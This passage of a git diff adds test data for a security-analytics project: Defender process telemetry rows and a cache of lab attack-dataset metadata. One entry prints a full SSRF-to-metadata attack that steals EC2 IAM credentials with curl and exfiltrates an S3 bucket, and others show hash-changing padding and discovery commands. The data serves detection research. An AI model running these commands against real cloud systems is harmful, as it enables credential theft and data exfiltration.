DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:22.117798700+00:00,5760,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-23 01:22:19.362041700+00:00,5684,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:22.268573700+00:00,2021-06-23 01:23:34.706614900+00:00,b3595fd0-ace2-42c4-9773-c5e292ab8d0e,computerpii_0a470890c60768167990033d701e7bd881398861,158017,False,10.7740.19041.1052,False,11540474045172410,,11540474045172411,2021-06-23 01:22:22.117798700+00:00,5760,2021-06-23 01:22:22.117798700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,5760,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-23 00:53:49.095230100+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1558,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:22.236394600+00:00,20208,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1908,12044919889243289069,12882310414426751854,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=453268203803769582 --mojo-platform-channel-handle=1920 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:22.117798700+00:00,5760,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-23 01:22:19.362041700+00:00,5684,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:22.270588200+00:00,2021-06-23 01:23:34.706693700+00:00,98b84cc8-6913-4368-94e7-7f0d20b84e01,computerpii_0a470890c60768167990033d701e7bd881398861,158018,False,10.7740.19041.1052,False,11540474045172410,,11540474045172412,2021-06-23 01:22:22.117798700+00:00,5760,2021-06-23 01:22:22.117798700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,5760,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-23 00:53:49.095230100+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1559,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:22.321273100+00:00,8060,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1908,12044919889243289069,12882310414426751854,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=13043232514922494943 --mojo-platform-channel-handle=2144 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:22.117798700+00:00,5760,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-23 01:22:19.362041700+00:00,5684,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:22.335583300+00:00,2021-06-23 01:23:34.706769600+00:00,a08ec79d-d38e-4680-88d2-b650983f8072,computerpii_0a470890c60768167990033d701e7bd881398861,158019,False,10.7740.19041.1052,False,11540474045172410,,11540474045172413,2021-06-23 01:22:22.117798700+00:00,5760,2021-06-23 01:22:22.117798700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,5760,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-23 00:53:49.095230100+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1560,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:22:59.007184900+00:00,7860,SenseCncProxy.exe,892,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:22:59.671992+00:00,2021-06-25 01:25:24.628482100+00:00,8a7be561-6b3d-427a-b839-d7f590621ebb,computerpii_0a470890c60768167990033d701e7bd881398861,183333,True,10.7740.19041.1052,False,11540474045137006,,11540474045178742,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+1561,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:24:38.241024200+00:00,660,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5624 /prefetch:8",PortableExecutable,2021-06-25 00:37:01.284115+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.59\identity_helper.exe,1080736,b4521adad3d48999783119440df8f778,307456fb34b9c5b7621b70a9da9659dedde6eea45c570afd960e9427a5d6c9df,9885be7d4dfa860f6f598414641ff2af5baf5845,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:24:38.775044900+00:00,2021-06-25 01:25:24.633618800+00:00,be2ef5f1-b338-4a06-8b62-529bc948fd73,computerpii_0a470890c60768167990033d701e7bd881398861,183381,False,10.7740.19041.1052,False,11540474045178212,,11540474045178748,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.59,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+1562,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:06:48.779508300+00:00,9752,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7308 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:06:48.794289900+00:00,2021-06-23 02:07:58.184675100+00:00,d111866c-ffcf-495e-8a0f-5ff4e36084fd,computerpii_0a470890c60768167990033d701e7bd881398861,159577,False,10.7740.19041.1052,False,11540474045171833,,11540474045172670,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+1563,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 02:34:39.576937300+00:00,10572,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320862_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320862 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:34:39.630568700+00:00,2021-06-25 02:34:51.246800500+00:00,58f18fa7-2a69-4af3-a37a-6ea48ec26f14,computerpii_0a470890c60768167990033d701e7bd881398861,185525,True,10.7740.19041.1052,False,11540474045144190,,11540474045179094,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
diff --git a/tests/testdata/mde_proc_pub.pkl b/tests/testdata/mde_proc_pub.pkl
new file mode 100644
index 000000000..66e85fd36
Binary files /dev/null and b/tests/testdata/mde_proc_pub.pkl differ
diff --git a/tests/testdata/mordor/mitre_tact_cache.pkl b/tests/testdata/mordor/mitre_tact_cache.pkl
new file mode 100644
index 000000000..88ab96c8b
Binary files /dev/null and b/tests/testdata/mordor/mitre_tact_cache.pkl differ
diff --git a/tests/testdata/mordor/mitre_tech_cache.pkl b/tests/testdata/mordor/mitre_tech_cache.pkl
new file mode 100644
index 000000000..630018ffe
Binary files /dev/null and b/tests/testdata/mordor/mitre_tech_cache.pkl differ
diff --git a/tests/testdata/mordor/mordor_cache.json b/tests/testdata/mordor/mordor_cache.json
new file mode 100644
index 000000000..be0d6fb2f
--- /dev/null
+++ b/tests/testdata/mordor/mordor_cache.json
@@ -0,0 +1,5325 @@
+{
+    "datasets/atomic/_metadata/SDAWS-200914011940.yaml": {
+        "title": "AWS Cloud Bank Breach S3",
+        "id": "SDAWS-200914011940",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/09/13",
+        "modification_date": "2020/09/13",
+        "platform": [
+            "AWS"
+        ],
+        "type": "atomic",
+        "tags": [
+            "EC2 Proxy Abuse",
+            "S3 Data Exfiltration"
+        ],
+        "description": "This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to obtain instance profile keys and eventually exfiltrate files from an S3 bucket.",
+        "attack_mappings": [
+            {
+                "technique": "T1078",
+                "sub-technique": "004",
+                "tactics": [
+                    "TA0001",
+                    "TA0003",
+                    "TA0004",
+                    "TA0005"
+                ]
+            },
+            {
+                "technique": "T1530",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0009"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "cloud",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/aws/collection/ec2_proxy_s3_exfiltration.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3",
+            "tools": [
+                {
+                    "type": "Cloud Formation Templates",
+                    "name": "AWS CLI",
+                    "module": "Exfiltration",
+                    "script": "https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3"
+                }
+            ],
+            "permissions_required": [
+                "user"
+            ],
+            "adversary_view": "> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/ -H \"Host:169.254.169.254\"                                            \nMordorNginxStack-BankingWAFRole-9S3E0UAE1MM0                                                                                                                                                              >\n\n> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 -H \"Host:169.254.169.254\"\n{\n\"Code\" : \"Success\",\n\"LastUpdated\" : \"2020-09-14T00:49:26Z\",\n\"Type\" : \"AWS-HMAC\",\n\"AccessKeyId\" : \"ASIA5FLZVX4OPVKKVBMX\",\n\"SecretAccessKey\" : \"aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03\",\n\"Token\" : \"TOKEN\",\n\"Expiration\" : \"2020-09-14T07:10:27Z\"\n}\n\n> aws configure --profile erratic\nAWS Access Key ID [None]: ASIA5FLZVX4OPVKKVBMX\nAWS Secret Access Key [None]: aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03\nDefault region name [None]: us-east-1\nDefault output format [None]: json\n\n> echo aws_session_token = \"TOKEN\" >> ~/.aws/credentials \n\n> aws s3 ls --profile erratic\n2020-09-13 20:00:32 mordorctstack-s3bucketforcloudtrail-1gj7vvt2ul642\n2020-09-13 19:59:59 mordors3stack-s3bucket-llp2yingx64a\n\n> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic\n2020-09-13 20:00:26         89 ring.txt\n\n> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic\n2020-09-13 20:00:26         89 ring.txt\n\n> aws s3 sync s3://mordors3stack-s3bucket-llp2yingx64a . --profile erratic                                   \ndownload: s3://mordors3stack-s3bucket-llp2yingx64a/ring.txt to ./ring.txt"
+        },
+        "references": [
+            "https://github.com/RhinoSecurityLabs/cloudgoat/tree/master/scenarios/cloud_breach_s3"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:23.026332+00:00"
+    },
+    "datasets/atomic/_metadata/SDLIN-201110074812.yaml": {
+        "title": "Arp Cache Discovery",
+        "id": "SDLIN-201110074812",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/11/10",
+        "modification_date": "2020/11/10",
+        "platform": [
+            "Linux"
+        ],
+        "type": "atomic",
+        "tags": null,
+        "description": "This dataset represents a threat actor using arp to list out the arp cache.",
+        "attack_mappings": [
+            {
+                "technique": "T1018",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0007"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/linux/discovery/host/sh_arp_cache.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "sh",
+                    "module": "sh",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md#atomic-test-6---remote-system-discovery---arp-nix"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "wardog@UBUNTU5:~$ arp -a | grep -v '^?'\n_gateway (192.168.2.1) at 12:34:56:78:9a:bc [ether] on eth0 "
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md#atomic-test-6---remote-system-discovery---arp-nix"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:23.196332+00:00"
+    },
+    "datasets/atomic/_metadata/SDLIN-201110081941.yaml": {
+        "title": "DD Binary Padding Hash Change",
+        "id": "SDLIN-201110081941",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/11/10",
+        "modification_date": "2020/11/10",
+        "platform": [
+            "Linux"
+        ],
+        "type": "atomic",
+        "tags": null,
+        "description": "This dataset represents a threat actor using dd to add a zero to the binary to change the hash.",
+        "attack_mappings": [
+            {
+                "technique": "T1027",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/linux/defense_evasion/host/sh_binary_padding_dd.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "sh",
+                    "module": "sh",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "md5sum /tmp/psexec.py \n5aa8b93e9b40c04d6d9d0cc8cd3975ed  /tmp/psexec.py\n\ndd if=/dev/zero bs=1 count=1 >> /tmp/psexec.py \n1+0 records in\n1+0 records out\n1 byte copied, 5.6002e-05 s, 17.9 kB/s\n\nmd5sum /tmp/psexec.py \nc509e5bd899de81d603da3f61e717837  /tmp/psexec.py"
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:23.388332+00:00"
+    },
+    "datasets/atomic/_metadata/SDLIN-211214154100.yaml": {
+        "title": "Log4jShell LDAP JNDI Lookup",
+        "id": "SDLIN-211214154100",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2021/12/14",
+        "modification_date": "2021/12/14",
+        "platform": [
+            "Linux"
+        ],
+        "type": "atomic",
+        "tags": null,
